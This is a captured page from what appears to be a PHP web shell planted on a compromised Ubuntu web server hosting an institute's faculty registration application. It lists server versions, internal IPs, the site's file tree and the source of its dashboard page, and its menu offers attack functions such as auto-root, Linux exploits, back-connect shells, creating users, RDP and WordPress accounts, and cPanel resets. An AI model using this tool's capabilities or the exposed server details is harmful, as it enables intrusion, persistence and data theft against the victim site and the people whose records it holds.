Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cipdapplication /
old /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
bower_components
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
documents
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
mailer
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
razorpay-php
[ DIR ]
drwxr-xr-x
uploadDoc
[ DIR ]
drwxrwxr-x
validation
[ DIR ]
drwxr-xr-x
404.php
2.86
KB
-rw-r--r--
changePassword.php
4.67
KB
-rw-r--r--
class.user-ankittill30725.php
5.29
KB
-rw-r--r--
class.user.php
4.84
KB
-rw-r--r--
common-oldbkp.php
5.19
KB
-rw-r--r--
common.php
5.99
KB
-rw-r--r--
config.php
296
B
-rw-r--r--
dashboard.php
5.13
KB
-rw-r--r--
dbconfig.php
1.29
KB
-rw-r--r--
error_log
5.69
KB
-rw-r--r--
forgotPassword.php
5.01
KB
-rw-r--r--
fpass.php
3.11
KB
-rw-r--r--
index.php
5.84
KB
-rw-r--r--
logout.php
645
B
-rw-r--r--
page-top.php
5.8
KB
-rw-r--r--
pay-bkp15722.php
8.49
KB
-rw-r--r--
pay-oldbkp.php
5.39
KB
-rw-r--r--
pay.php
5.34
KB
-rw-r--r--
personalInformations-oldofcsed...
24.15
KB
-rw-r--r--
personalInformations.php
1
KB
-rw-r--r--
register-ankittill30725.php
16.12
KB
-rw-r--r--
register-nandini.php
14.88
KB
-rw-r--r--
register-originaltill29725.php
16.71
KB
-rw-r--r--
register.php
15.56
KB
-rw-r--r--
registrationVerify.php
2.46
KB
-rw-r--r--
resetpass.php
5.25
KB
-rw-r--r--
test-error.php
430
B
-rw-r--r--
verify-bkp15722.php
12.67
KB
-rw-r--r--
verify-oldbkp.php
7.15
KB
-rw-r--r--
verify.php
9.6
KB
-rw-r--r--
viewStudentDetails.php
18.73
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dashboard.php
<?php error_reporting(E_ALL); ob_start(); require __DIR__ . DIRECTORY_SEPARATOR . "lib" . DIRECTORY_SEPARATOR . "config.php"; // HTML require PATH_LIB . "page-top.php"; $studentID = $row[ 'studentID' ]; //$tokenAuth = $row[ 'authtokenid' ]; require_once 'common.php'; $studentDetails = new STUDENT(); $emailID = $row[ 'studentEmail' ]; ?> <script type="text/javascript">//<![CDATA[ window.onload=function(){ } //]]></script> <script > function printDiv(divName) { var printContents = document.getElementById(divName).innerHTML; var originalContents = document.body.innerHTML; document.body.innerHTML = printContents; window.print(); document.body.innerHTML = originalContents; } </script> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <!-- Content Header (Page header) --> <section class="content-header"> <h1> Dashboard <!--<small>Control panel</small> --> </h1> <ol class="breadcrumb"> <li><a href="#"><i class="fa fa-dashboard"></i> Home</a></li> <li class="active">Dashboard</li> </ol> </section> <section class="content"> <?php $formStatus = "APPLIED"; $stmt2s = $studentDetails->runQuery( "SELECT * FROM studentregistration WHERE studentEmail = :emailID"); $stmt2s->execute( array( ":emailID" => $emailID ) ); $row2 = $stmt2s->fetch( PDO::FETCH_ASSOC ); ?> <div class="row"> <div class="col-xs-12" style="padding-left: 0px; padding-right: 0px;"> <div class="box"> <!-- /.box-header --> <?php if($formStatus =="APPLIED"){ ?> <!--<div class="box-header"> <h3 class="box-title"><strong>Application Details</strong></h3> </div> --> <div class="box-body" id="printableArea"> <center> <table id="example1" class="table table-bordered table-striped" style=" width: 765px;"> <!--<tr > <td colspan="2"><center><img src="https://www.iiitd.ac.in/sites/all/themes/impact_theme/logo.png"></center></td> </tr>--> <tr><td colspan="2" style="text-align:center; font-size:16px;"><strong><img src="https://cipd.iiitd.ac.in/wp-content/uploads/2025/02/CiPDlogo.png" alt="CiPD Logo" style="width:30%;" /></strong></td></tr> <tr><td colspan="2" style="text-align:center; font-size:16px;"><strong>Registration Details for CiPD Adjunct Faculty</strong></td></tr> <!-- <tr> <td><strong>Recent Photo</strong></td> <td><img class="profile-user-img img-responsive img-circle-" src="uploadDoc/<?php echo $row2['photo']; ?>" alt="User profile picture"></td> <!-<td><?php echo $row2['photo'] ?></td>-> </tr> --> <tr> <td><strong>Name</strong></td> <td><?php echo $row2['studentName']; ?></td> </tr> <tr> <td><strong>Email ID</strong></td> <td><?php echo $row2['studentEmail']; ?></td> </tr> <tr> <td><strong>Mobile Number</strong></td> <td><?php echo $row2['studentMobile']; ?></td> </tr> <tr> <td><strong>Institution Name</strong></td> <td><?php echo $row2['institutionName']; ?></td> </tr> <tr> <td><strong>Domain</strong></td> <td><?php echo $row2['domains']; ?></td> </tr> <tr> <td><strong>Sub Domain</strong></td> <td><?php echo $row2['subdomains']; ?></td> </tr> <tr> <td><strong>Experience</strong></td> <td><?php echo $row2['experience']; ?></td> </tr> <tr> <td><strong>Linkedin URL</strong></td> <td><?php echo $row2['linkdinurl']; ?></td> </tr> <tr> <td><strong>Website URL</strong></td> <td><?php echo $row2['weburl']; ?></td> </tr> <tr> <td><strong>Registration Date & Time (yyyy-mm-dd h:m:s)</strong></td> <td><?php echo $row2['regDate']; ?></td> </tr> </table></center> <br/><center><button class="btn btn-primary hidden-print" onClick="printDiv('printableArea')"><span class="glyphicon glyphicon-print" aria-hidden="true"></span> Print</button></center> </div> <?php } else { ?> <div class="box-body">No Record Found. Please fill the form to get the details here. </div> <?php } ?> <!-- /.box-body --> </div> <!-- /.box --> </div> <!-- /.col --> </div> </section> </div> <script > function printDiv(divName) { var printContents = document.getElementById(divName).innerHTML; var originalContents = document.body.innerHTML; document.body.innerHTML = printContents; window.print(); document.body.innerHTML = originalContents; } </script> <?php ob_end_flush(); require PATH_LIB . "page-bottom.php"; ?>
Close